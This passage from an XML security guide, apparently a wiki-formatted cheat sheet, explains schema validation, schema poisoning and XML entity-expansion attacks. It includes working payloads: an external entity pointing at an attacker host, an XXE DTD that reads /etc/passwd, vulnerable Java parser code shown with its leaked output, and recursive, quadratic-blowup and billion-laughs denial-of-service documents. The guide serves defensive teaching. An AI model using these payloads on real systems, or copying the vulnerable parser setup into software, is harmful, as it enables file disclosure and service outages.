    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
Using the DTD capabilities of referencing local or remote files it is possible to affect the confidentiality. In addition, it is also possible to affect the availability of the resources if no proper restrictions have been set for the entities expansion. Consider the following example code of an XXE.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import javax.xml.parsers.ParserConfigurationException;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.DocumentException;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import java.io.File;&lt;br /&gt;
 import java.io.FileReader;&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
    FileReader fr = new FileReader(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    File file = new File(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, new FileInputStream(file));&lt;br /&gt;
    int eventType = xmlfer.getEventType();&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     eventType = xmlfer.next(); &lt;br /&gt;
     if(xmlfer.hasText()){&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
    fr.close();&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
